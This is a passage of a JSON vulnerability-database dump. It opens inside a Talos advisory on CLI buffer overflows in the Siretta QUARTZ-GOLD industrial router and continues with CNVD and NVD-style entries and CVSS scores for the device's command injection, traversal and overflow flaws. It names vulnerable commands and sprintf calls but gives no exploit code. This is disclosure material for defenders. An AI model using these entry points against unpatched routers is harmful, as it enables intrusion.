stack-based buffer overflow can be reached using the following command template:\n \n \n vpn schedule name1 WORD name2 WORD policy (failover|backup) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%s<%d<%s\",1,*argv,argv[1],based_on_argv[2],argv[3]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41028 - no vpn schedule name1\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no vpn schedule name1 WORD name2 WORD policy (failover|backup) description (WORD|null)\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x100,\"%d<%s<%s<%d<%s\",1,*argv,argv[1],based_on_argv[2],argv[3]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41029 - wlan filter mac address\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n wlan filter mac address WORD descript WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x20,\"%s%s%s%s%s%s<%s\",octet_from_argv0[0],octet_from_argv0[1],octet_from_argv0[2],octet_from_argv0[3],octet_from_argv0[4],octet_from_argv0[5],argv[1]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n#### CVE-2022-41030 - no wlan filter mac address\n\nThis stack-based buffer overflow can be reached using the following command template:\n \n \n no wlan filter mac address WORD descript WORD\n \n\nIf the command is issued correctly, the following code will be reached:\n \n \n sprintf(buff_0x20,\"%s%s%s%s%s%s<%s\",octet_from_argv0[0],octet_from_argv0[1],octet_from_argv0[2],octet_from_argv0[3],octet_from_argv0[4],octet_from_argv0[5],argv[1]);\n \n\nThe function executing this code is vulnerable to a stack-based buffer overflow.\n\n##### TIMELINE\n\n2022-10-14 - Initial Vendor Contact\n\n2022-10-20 - Vendor Disclosure\n\n2022-11-24 - Vendor Patch Release\n\n2023-01-26 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2022-1639\n\nPrevious Report\n\nTALOS-2022-1612\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T00:00:00", "type": "talos", "title": "Siretta QUARTZ-GOLD DetranCLI command parsing stack-based buffer overflow vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40985", "CVE-2022-40986", "CVE-2022-40987", "CVE-2022-40988", "CVE-2022-40989", "CVE-2022-40990", "CVE-2022-40991", "CVE-2022-40992", "CVE-2022-40993", "CVE-2022-40994", "CVE-2022-40995", "CVE-2022-40996", "CVE-2022-40997", "CVE-2022-40998", "CVE-2022-40999", "CVE-2022-41000", "CVE-2022-41001", "CVE-2022-41002", "CVE-2022-41003", "CVE-2022-41004", "CVE-2022-41005", "CVE-2022-41006", "CVE-2022-41007", "CVE-2022-41008", "CVE-2022-41009", "CVE-2022-41010", "CVE-2022-41011", "CVE-2022-41012", "CVE-2022-41013", "CVE-2022-41014", "CVE-2022-41015", "CVE-2022-41016", "CVE-2022-41017", "CVE-2022-41018", "CVE-2022-41019", "CVE-2022-41020", "CVE-2022-41021", "CVE-2022-41022", "CVE-2022-41023", "CVE-2022-41024", "CVE-2022-41025", "CVE-2022-41026", "CVE-2022-41027", "CVE-2022-41028", "CVE-2022-41029", "CVE-2022-41030"], "modified": "2023-01-26T00:00:00", "id": "TALOS-2022-1613", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cnvd": [{"lastseen": "2023-03-17T11:26:00", "description": "Siretta QUARTZ-GOLD is an industrial router with multiple features and services.A directory traversal vulnerability exists in Siretta QUARTZ-GOLD, which can be exploited by attackers to cause arbitrary file deletion by sending specially crafted network packets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 2.5}, "published": "2023-02-01T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD Directory Traversal Vulnerability", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-41154"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17064", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17064", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T05:24:50", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to a buffer overflow vulnerability that can be exploited by attackers to cause arbitrary command execution via specially crafted network packets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD Buffer Overflow Vulnerability (CNVD-2023-17073)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-41030"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17073", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17073", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T05:25:02", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to an operating system command injection vulnerability that could be exploited by an attacker to cause arbitrary command execution by sending a crafted network request.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD OS Command Injection Vulnerability (CNVD-2023-17082)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-40220"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17082", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17082", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T05:24:35", "description": "Siretta QUARTZ-GOLD is an industrial router with multiple features and services.A file-writing vulnerability exists in Siretta QUARTZ-GOLD, which can be exploited by attackers to cause arbitrary file uploads via specially crafted HTTP requests.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-01T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD file writing vulnerability", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-39045"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17065", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17065", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T05:25:02", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to an operating system command injection vulnerability that could be exploited by an attacker to cause arbitrary command execution by sending a crafted network request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD OS Command Injection Vulnerability (CNVD-2023-17083)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-40222"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17083", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17083", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T05:24:56", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to an operating system command injection vulnerability, which can be exploited by attackers to cause the execution of arbitrary commands by sending specially crafted HTTP responses.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD OS Command Injection Vulnerability (CNVD-2023-17079)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-38066"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17079", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17079", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T05:24:50", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to an operating system command injection vulnerability that could be exploited by an attacker to cause arbitrary command execution via a crafted network request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD OS Command Injection Vulnerability", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-42490"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17075", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17075", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T05:25:13", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to an operating system command injection vulnerability that could be exploited by an attacker to cause arbitrary command execution by sending a crafted network request.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD OS Command Injection Vulnerability (CNVD-2023-17093)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-42493"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17093", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17093", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T05:24:53", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to a directory traversal vulnerability that could be exploited by an attacker to send specially crafted HTTP requests resulting in arbitrary file deletion.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD Directory Traversal Vulnerability (CNVD-2023-17076)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-40701"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17076", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17076", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T05:24:55", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to a directory traversal vulnerability that could be exploited by attackers to send specially crafted HTTP requests resulting in arbitrary file reads.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD Directory Traversal Vulnerability (CNVD-2023-17077)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-38088"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17077", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17077", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-15T05:24:59", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to a buffer overflow vulnerability that could be exploited by an attacker to cause remote code execution by sending a specially crafted HTTP request.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD Buffer Overflow Vulnerability (CNVD-2023-17080)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-38459"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17080", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17080", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-09T23:25:09", "description": "Siretta QUARTZ-GOLD is a high-speed industrial router from Siretta. Siretta QUARTZ-GOLD version G5.0.1.5-210720-141020 contains a residual debug code vulnerability that can be exploited by attackers to cause remote code execution by sending specially crafted HTTP requests.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-28T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD Remaining Debug Code Vulnerability", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-38715"], "modified": "2023-03-09T00:00:00", "id": "CNVD-2023-15940", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-15940", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T11:26:21", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to OS command injection, which can be exploited by attackers to cause arbitrary commands to be executed by sending crafted HTTP requests.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD OS Command Injection Vulnerability (CNVD-2023-17084)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-40969"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17084", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17084", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-09T23:25:25", "description": "Siretta QUARTZ-GOLD is a high-speed industrial router from Siretta.Siretta QUARTZ-GOLD version G5.0.1.5-210720-141020 is vulnerable to a buffer overflow vulnerability that could be exploited by attackers to execute arbitrary commands.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-09T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD Buffer Overflow Vulnerability (CNVD-2023-15941)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-40985"], "modified": "2023-03-09T00:00:00", "id": "CNVD-2023-15941", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-15941", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T11:26:15", "description": "Siretta QUARTZ-GOLD is a high-speed dual-port Gigabit Ethernet industrial router from Siretta.The Siretta QUARTZ-GOLD is vulnerable to a buffer overflow vulnerability that could be exploited by an attacker to cause remote code execution by sending a specially crafted HTTP request.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD Buffer Overflow Vulnerability (CNVD-2023-17078)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-36279"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17078", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17078", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-17T11:26:10", "description": "Siretta QUARTZ-GOLD is a high-speed industrial router from Siretta. Siretta QUARTZ-GOLD is vulnerable to a buffer overflow vulnerability, which can be exploited by attackers to cause a heap buffer overflow by sending specially crafted HTTP requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T00:00:00", "type": "cnvd", "title": "Siretta QUARTZ-GOLD Buffer Overflow Vulnerability (CNVD-2023-17074)", "bulletinFamily": "cnvd", "cvss2": {}, "cvelist": ["CVE-2022-41991"], "modified": "2023-03-14T00:00:00", "id": "CNVD-2023-17074", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2023-17074", "cvss": {"score": 0.0, "vector": "NONE"}}], "prion": [{"lastseen": "2023-08-15T19:59:15", "description": "A leftover debug code vulnerability exists in the httpd shell.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-38715", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38715"], "modified": "2023-02-02T17:22:00", "id": "PRION:CVE-2022-38715", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-38715", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T20:45:26", "description": "An OS command injection vulnerability exists in the httpd txt/restore.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-40220", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-40220"], "modified": "2023-02-02T17:20:00", "id": "PRION:CVE-2022-40220", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-40220", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T22:04:06", "description": "An OS command injection vulnerability exists in the httpd logs/view.cgi functionality of FreshTomato 2022.5. A specially crafted HTTP request can lead to arbitrary command execution. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T11:15:00", "type": "prion", "title": "CVE-2022-42484", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-42484"], "modified": "2023-02-06T21:51:00", "id": "PRION:CVE-2022-42484", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-42484", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T19:53:47", "description": "A directory traversal vulnerability exists in the httpd downfile.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to arbitrary file read. An attacker can send an HTTP request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-26T22:15:00", "type": "prion", "title": "CVE-2022-38088", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-38088"], "modified": "2023-02-02T17:22:00", "id": "PRION:CVE-2022-38088", "href": "https://kb.prio-n.com/vulnerability/CVE-2022-38088", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}, {"lastseen": "2023-08-15T20:45:26", "description": "An OS command injection vulnerability exists in the m2m DELETE_FILE cmd functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, 